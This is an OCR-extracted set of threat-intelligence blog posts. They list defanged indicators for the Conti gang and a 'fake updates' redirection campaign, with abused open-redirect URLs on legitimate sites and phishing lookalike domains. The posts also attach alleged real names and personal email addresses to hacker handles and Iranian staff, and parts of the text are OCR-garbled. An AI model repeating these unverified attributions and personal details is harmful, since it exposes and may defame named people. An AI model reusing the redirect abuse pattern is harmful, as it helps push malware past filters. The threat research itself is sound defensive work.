
WhatsApp: +373 775 96666 

OuHNanh-yartT: https://morene[.]host 


Full Names of Ashiyane Digital Security Team Members - 2023-12-01 14:16 


The following compilation is a set of full names of Ashiyane Digital Security Team 
Members. 


The following are the full names of Ashiyane Digital Security Team Members: 
Keyvan Sedaghati — keivan 

Ramin Baz Ghandi — frOnk 

Erfan Zadpoor — PrinceofHacking 

Hamid Norouzi — eychenz 

Poorya Mohammadrezaei — Hijacker 
Omid Norouzi — Sha2ow 

Milad Bokharaei — ®Maste 

Vahid Maani — WAHID 2 

Kaveh Jasri — root3r 

Ali Hayati — Zend 

Milad Mazaheri — mmilad200 
Mohammad Reza — iNJECTOR 
Mohammad Mohammadi — Classic 

Nima Salehi — Q7X 

Milad Jafari — Milad-Bushehr 

Shahin Salak Tootonchi — ruiner_blackhat 
Amin Bandali — anti206 

Mohammad Hadi Nasiri — unique2world 
Mahdi Chinichi — Virangar 

Amir Hossein Tahmasebi — __amir__ 
Ashkan Hosseini — Askn 

Mohammad Tajik — taghva 

Meghdad Mohammadi — M3QD4D 

Sina Ahmadi Neshat — Encoder 

Behrouz Kamalian — Behrouz_ice) 
Farshid Sargheini — Azazel 

Armin — n3me3iz 

Mahdi K. — r3d.zOnE 

Iman Honarvar — iman_taktaz 

Ali Seid Nejad — Ali_Eagle 

Mohammad Reza Ali Babaei — mzhacker 
Navid Naghdi — elvator 

Mohammad Reza Dolati — HIDDEN-HUNTER 
Mehrab Akherati — AliAkh 

Amin Javid — Gladiator 


Cybercrime-Friendly Forum Communities - 2023-12-01 14:16 


The following is a recently obtained compilation of currently active cybercrime-friendly 
forum communities. 


Sample cybercrime-friendly forum communities include: 
hxxp://www.darkteam.se/ 
hxxp://crdforum.cc/ 
hxxp://legitcarders.ws/ 
hxxp://cardingworld.ru 
hxxp://carders.biz/ 
hxxp://carding.cm/ 
hxxp://cardmafia.cc/ 
hxxp://cardingforum.cx/ 
hxxp://carder.market/ 
hxxp://www.russiancarders.se/ 
hxxp://darkwebmafias.net/ 
hxxp://legendzforum.com/ 
hxxp://procrax.cx/ 


Emennet Pasargad - 2023-12-02 13:18 
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The following are domains and personally identifiable email address accounts belonging 
to Iran's Emennet Pasargad also known as Eeleyanet Gostar and Eeleyanet Gostar. 
Sample domains: 

eeleyanet.com 

eeleyanet.ir 

Sample personally identifiable email address accounts: 
sidafin@mihanmail.ir 

amirhaghighi2014@yahoo.com 

safary.mansoor@gmail.com 

Rahimi@Live.com 

faranakbehjati@yahoo.com 

h.boloukat@gmail.com 


The Conti Ransomware Gang's OSINT Artifacts - 2023-12-02 16:58 


The following is a set of OSINT artifacts courtesy of the Conti Ransomware gang. 


hxxp://cc2-btc.cc 

hxxp://dyncheck.com 

hxxp://luxchecker.pw 

hxxp://major.ms 

hxxp://securecall.club 

hxxp://securecall.top 

hxxp://checkzilla.io 

Including the following two XMPP/Jabber accounts: 
mcduckgroup@exploit.im 

uvoice@xmpp.jp 


The Most Innovative Cyber Security Leader to Watch in 2023 - 2023-12-15 
19:01 


Dear blog readers, 


| did it. Check out the article here. 


Related photos: 
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The certificate is awarded to 


by ClOLook in recognition as one of 


The Most Innovative Cyber Security 
Leaders to Watch in 2023 


for empowering excellence through Innovative solutions and driving 
transformations in the niche. 
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Looking for a Research Sponsorship - 2023-12-15 19:02 


Dear blog readers, 


Are you interested in sponsoring my research on my way to grab a new laptop for the 
holidays? 


Drop me a line at dancho.danchev@hush.com to discuss and I'll do my best to deliver 
the results that we agree upon. 


Offering my Laptop for Memorabilia Purposes - 2023-12-15 19:02 


Dear blog readers, 


Who wants to acquire and purchase my laptop 2015-2023 for memorabilia purposes and 
possibly somehow use it preserve or display it somewhere? 


Related photo: 


ee Bit 


zs ~-by Dancho Oanchey STE: 
Utes Pad anche, blog spat, co ar <— 
Email: gancho.dagchev@hush.com > 


SS 


Drop me a line at dancho.danchev@hush.com 


Upcoming Webinar Participation - 2023-12-15 19:02 


UNIVERSITE PARIS 1 PANTHEON SORBONNE 


As JAE PARIS QIXRATOR 


CONQUER YOUR RISK 


The evolving threat landscape and the future of cybercrime. 


: SPEAKERS 
MONDAY 

12 December 2023 Dancho Danchev 
18:30 (Paris) Threat Intelligence Pioneer 
Nation-state cybercrime researcher 

HOSTED BY - 
A e . Ronan Mouchoux 
(4) real Fon ioe Threat Intelligence Specialist 
Co-Director of the Risk Chair Cofounder of XRATOR 


Dear blog readers, 


Check out the link here. 


Who's Pushing All The "Fake Updates" Malicious Software Using Redirectors 
and Traffic Distribution and Redirection Systems and Tools Domains? - 2023- 
12-28 13:03 


Redirect Warning e 


You're opening a new web page going to host 
anp1swZv.biggerfun.org that is not part of NPC. 


Please double check that the address is correct 


http//anp1swZv.biggerfun.org/anp1swZv/ 


Continue or Cancel 
_ 


I've recently observed an increase in compromised or exploited to be precise in the 
context of abusing unfixed web application flaws such as for instance redirection 
notifications on high-traffic and high-profile Web sites where the ultimate goal would be 
to push traffic distribution and traffic management rogue domains part of a URL 
redirection chain where the ultimate goal would be to utilize both legitimate high-traffic 
and high-profile Web sites including purely malicious Web sites for the purpose of 


dropping malicious software on the targeted hosts. 

The surprising part? The primary and entire portfolio of these traffic redirection and 
traffic management domain are parked on 193.106.175.18 - AS50465 - IQHost Ltd where 
one of the bigger domain farms is parked at hxxp://biggerfun.org. 


fonts.googleapis.com 


fonts. gstatic.com 


machinetext.org 


———— surelytheme.org 
freethegirlinitiative.org omc 


bluegaslamp.org 
draggedline.org 


throatpills.org 


climedballon.org 


Sample misconfigured high-traffic and high-profile Web sites that allow 
redirections potentially bypassing reputation filters include: 


hxxp://afmonline.org/?URL=hxxp://khTrnBOWV8.biggerfun.org/khTrnBOWV8/ 
hxxp://whiskyparts.co/?URL=m88Z2iiER.biggerfun.org/mM88Z2iiER/ 
hxxp://hardemancounty.org/? URL=http%3A%2F%2F 1FXddDHkYN.biggerfun.org/ 
1FXddDHkYN/ 

hxxp://bukkit.org/proxy.php?link=hxxp://uToqSuwC. biggerfun.org/uToqSuwC/ 
hxxp://www.centralsynagogue.org/? URL=hxxp://NjNr8Mkm.biggerfun.org/NjNr8Mkm/ 
hxxp://board-en.piratestorm.com/proxy.php?link=http%3A%2F 
%2Fnpn8KwBr.biggerfun.org/npn8KwBr/ 
hxxp://boards.theforce.net/proxy.php?link=hxxp://WihYqBBuvj.biggerfun.org/ 
WihYqBBuvj/ 
hxxp://www.cutrite.com.au/?URL=hxxp://9MVRIHjF.biggerfun.org/9MVRIHjF/ 


khTrmnBOWVS8.biggerfun.org QmVRIHjF.biggerfun.org WihYqBBuyj.biggerfun.org NjNr8Mkm.biggerfun.org uToqSuwC. biggerfun.org m88Z2iiER. biggerfun.org 


2) 


193.106.175.18 


Sample traffic redirection and traffic management domains involved in the 
campaign include: 


hxxp://surelytheme.org 
hxxp://bluegaslamp.org 
hxxp://throatpills.org 
hxxp://draggedline.org 
hxxp://machinetext.org 
hxxp://throatpills.org 
hxxp://climedballon.org 


khTmBOWV8.biggerfun.org QmVRIHjF.biggerfun.org WihYqBBuyj.biggerfun.org NjNr8Mkm.biggerfun.org uToqSuwC. biggerfun.org m88Z2iiER.biggerfun.org 


a) 


= 
193.106.175.18 


k/ ga 9 


50465 193.106.175.18 Moscow 
(ve) 

Kk, 

!QHost Ltd 


Sample related domains known to have been involved in the campaign and are 


currently parked at 193.106.175.18 - AS50465 - IQHost Ltd include: 


hxxp://jsqur.com 
hxxp://libertader.org 
hxxp://mrbotn.jsqur.com 
hxxp://www.catsndogz.org 
hxxp://user179.jsqur.com 
hxxp://marcusdesigninc.jsqur.com 
hxxp://nuvoleparlanti.jsqur.com 
hxxp://fserver.jsqur.com 
hxxp://download.www.windowlight.org 
hxxp://mtf-misawa.jsqur.com 
hxxp://cdn.jsqur.com 
hxxp://dashtiha.jsqur.com 
hxxp://vitkutin.jsqur.com 
hxxp://permisdeconduire.jsqur.com 
hxxp://olympics.jsqur.com 
hxxp://emv1.vibedroom.org 
hxxp://melpar-emh1.jsqur.com 
hxxp://u.admin.backendjs.org 
hxxp://billtieleman.jsqur.com 
hxxp://descarte.jsqur.com 
hxxp://4m.jsqur.com 
hxxp://sn007.jsqur.com 
hxxp://win24.jsqur.com 
hxxp://web3449.jsqur.com 
hxxp://cgxdave.jsqur.com 
hxxp://cassandre.jsqur.com 
hxxp://deeptrickday.org 
hxxp://xxxl80.jsqur.com 
hxxp://91.jsqur.com 
hxxp://castlerea.jsqur.com 
hxxp://dkline.jsqur.com 
hxxp://daws-512.jsqur.com 
hxxp://ufl.jsqur.com 
hxxp://eggert.jsqur.com 
hxxp://apps.jqueryj.com 
hxxp://frightysever.org 
hxxp://beal.jsqur.com 
hxxp://survey.backendjs.org 
hxxp://best-funny-quotes.jsqur.com 
hxxp://jeanm.jsqur.com 
hxxp://forms.admin.backendjs.org 
hxxp://comtenc.jsqur.com 
hxxp://dannyfilm.jsqur.com 
hxxp://office.backendjs.org 
hxxp://jqueryj.com 
hxxp://longtail.jsqur.com 
hxxp://web6201.jsqur.com 
hxxp://hoytek-gw4.jsqur.com 
hxxp://gazeta.jsqur.com 
hxxp://www.treegreeny.org 


hxxp://cpfm.jsqur.com 
hxxp://asims-rdck1.jsqur.com 
hxxp://indiajobscircle.jsqur.com 
hxxp://babbar.jsqur.com 
hxxp://gorki.jsqur.com 
hxxp://gmailblog.jsqur.com 
hxxp://dvan.jsqur.com 
hxxp://carpinteros-aluminio.jsqur.com 
hxxp://web18332.jsqur.com 
hxxp://wallah.jsqur.com 
hxxp://si.jsqur.com 
hxxp://shems.jsqur.com 
hxxp://vigen.jsqur.com 
hxxp://sws.jsqur.com 
hxxp://routetest.jsqur.com 
hxxp://account.admin.backendjs.org 
hxxp://secure-ite2-origin.jsqur.com 
hxxp://mdm.backendjs.org 
hxxp://_dmarc.jqueryns.com 
hxxp://mdm.backendjs.org 
hxxp://mntc.jsqur.com 
hxxp://powerful.jsqur.com 
hxxp://whitney.jsqur.com 
hxxp://stream.jsqur.com 
hxxp://uhost.jsqur.com 
hxxp://unix3.jsqur.com 
hxxp://www.florida.jsqur.com 
hxxp://jkelley.jsqur.com 
hxxp://derby.jsqur.com 
hxxp://currier.jsqur.com 
hxxp://wp.admin.backendjs.org 
hxxp://frente-a-camaras.jsqur.com 
hxxp://facman.jsqur.com 
hxxp://b10.jsqur.com 
hxxp://arehn.jsqur.com 
hxxp://cprat.jsqur.com 
hxxp://hpermsp.jsqur.com 
hxxp://kKsia.jsqur.com 
hxxp://jnansen.jsqur.com 
hxxp://biggerfun.org 
hxxp://Kodakr.jsqur.com 
hxxp://samfox.jsqur.com 
hxxp://apps.jsqur.com 
hxxp://passe.jsqur.com 
hxxp://walkman.jsqur.com 
hxxp://stovallscx.jsqur.com 
hxxp://antivir.jsqur.com 
hxxp://link2-me.jsqur.com 
hxxp://xx9.jsqur.com 
hxxp://quine.jsqur.com 
hxxp://v.circuspride.org 
hxxp://cn.circuspride.org 
hxxp://x.circuspride.org 


hxxp://pay.circuspride.org 
hxxp://ssl.circuspride.org 
hxxp://physiology.jsqur.com 
hxxp://mytabletpcuk.jsqur.com 
hxxp://gdsz.jsqur.com 
hxxp://daws-43-5.jsqur.com 
hxxp://cfg.circuspride.org 
hxxp://ip90.jsqur.com 
hxxp://oily.jsqur.com 
hxxp://jqueryh.org 
hxxp://tamarack.jsqur.com 
hxxp://macgo.jsqur.com 
hxxp://interlock.jsqur.com 
hxxp://cmu-cc-vma.jsqur.com 
hxxp://daws91-3.jsqur.com 
hxxp://norman.jsqur.com 
hxxp://www.16.jsqur.com 
hxxp://web3933.jsqur.com 
hxxp://mta-sts.bluegaslamp.org 
hxxp://212.jsqur.com 
hxxp://dooly.jsqur.com 
hxxp://www.bigbricks.org 
hxxp://machinetext.org 
hxxp://kb.windowlight.org 
hxxp://catsndogz.org 
hxxp://whitedrill.org 
hxxp://www.neworderspath.org 
hxxp://jqueryns.com 
hxxp://sorteios-e-promocoes.jsqur.com 
hxxp://web5422.jsqur.com 
hxxp://ivtortypafyi.greedyclowns.org 
hxxp://ivtorlypqfyi.greedyclowns.org 
hxxp://ivladimir.surelytheme.org 
hxxp://ivodimir.surelytheme.org 
hxxp://liorida.surelytheme.org 
hxxp://rota-sts.climedballon.org 
hxxp://climedballon.org 
hxxp://treegreeny.org 
hxxp://daddygarages.org 
hxxp://emperorplan.org 


f. 


of 


hxxp://bigbricks.org 
hxxp://greedyclowns.org 
hxxp://vibedroom.org 
hxxp://backendjs.org 
hxxp://dailytickyclock.org 
hxxp://neworderspath.org 
hxxp://devcodejs.org 
hxxp://cancelledfirestarter.org 
hxxp://greedyfines.org 
hxxp://limeerror.org 
hxxp://bluegaslamp.org 
hxxp://throatpills.org 
hxxp://drilledgas.org 
hxxp://draggedline.org 
hxxp://windowlight.org 
hxxp://sevenpunches.org 
hxxp://circuspride.org 
hxxp://linedgreen.org 
hxxp://surelytheme.org 
hxxp://vivaldi-ed.group 
hxxp://cashapp-renewal.com 
hxxp://ing-update.info 
hxxp://bankid-app.net 
hxxp://commonwealth-renewal.com 
hxxp://transfer-management.com 
hxxp://banko-atnaujinimas.com 
hxxp://s-identity-verwalten.com 
hxxp://bigfat.shop 
hxxp://fomzerapoze.shop 
hxxp://aremonuza.shop 
hxxp://hnanmozapre.shop 
hxxp://bamizorapa.shop 
hxxp://yazevora.com 
hxxp://ipko-aktualizacja.com 
hxxp://halifax.signin-helpdesk.com 
hxxp://signin-helpdesk.com 
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hxxp://hailfax.signin-helpdesk.com 
hxxp://online-helpdesk-portal.com 
hxxp://santander.online-helpdesk-portal.com 
hxxp://jquerypure.com 
hxxp://de-system-913580.xyz 
hxxp://targo.de-system-913580.xyz 
hxxp://be-systeem-8510598.xyz 
hxxp://ns1.putinkremel.su 
hxxp://notudhost.com.ru 
hxxp://trsew.ru 
hxxp://fashmodsite.uno 
hxxp://nnnten.ru 
hxxp://tenhost.com.ru 
hxxp://au-08.top 
hxxp://jutralalali.xyz 
hxxp://gilirges.ru 
hxxp://www.gilirges.ru 
hxxp://ftp.gilirges.ru 
hxxp://www.tanmhopisj.xyz 
hxxp://tanmhopisj.xyz 
hxxp://dev.urbangroup.ru 
hxxp://equalizer.dev.urbangroup.ru 
hxxp://vk.equalizer.dev.urbangroup.ru 
hxxp://partners.urbangroup.ru 
hxxp://realty-2.urbangroup.ru 
hxxp://ivakino.urbangroup.ru 
hxxp://gtry.ru 

hxxp://serferio.ru 
hxxp://forum-laikovo.urbangroup.ru 
hxxp://urbangroup.ru 
hxxp://myrussianland.ru 
hxxp://gb2nevinsk.ru 
hxxp://englishbiblioteka.ru 
hxxp://aleana63.ru 
hxxp://aptekaplus23.ru 
hxxp://chulkovo.info 
hxxp://mchedlidze.ru 
hxxp://stroytransm.ru 
hxxp://flystore.ru 
hxxp://kino-pirat.net 
hxxp://2sunss.com 
hxxp://posadisvoederevo.ru 
hxxp://testcosmetic.com 
hxxp://vkino.me 
hxxp://v1080hd.com 
hxxp://r-style.com 
hxxp://science-techno.ru 
hxxp://kinotuz.ru 

hxxp://901901.ru 

hxxp://ludota.ru 
hxxp://maindoor.ru 
hxxp://kKinoxaba.ru 
hxxp://youcanexcel.ru 


hxxp://gidonlinehd.ru 
hxxp://kinoggo.ru 
hxxp://100pdf.net 
hxxp://kinoext.ru 
hxxp://www.mreporter.ru 
hxxp://magobr.ru 
hxxp://Ig-soft.ru 
hxxp://anapa-new.ru 
hxxp://fat-man.ru 
hxxp://gracio.ru 
hxxp://ikd.ru 
hxxp://poseidonboat.ru 
hxxp://vetla.ru 
hxxp://74dom.ru 
hxxp://Kabrik-servis.ru 
hxxp://tehnopanda.ru 
hxxp://creativejournal.ru 
hxxp://ufamenu.ru 
hxxp://idf.ru 
hxxp://sporthit.ru 
hxxp://injgeo.ru 
hxxp://asbank.ru 
hxxp://wood-lux.ru 
hxxp://lof51b14.justinstalledpanel.com 


I'll continue monitoring the campaign and will post updates as soon as new 
developments take place. 


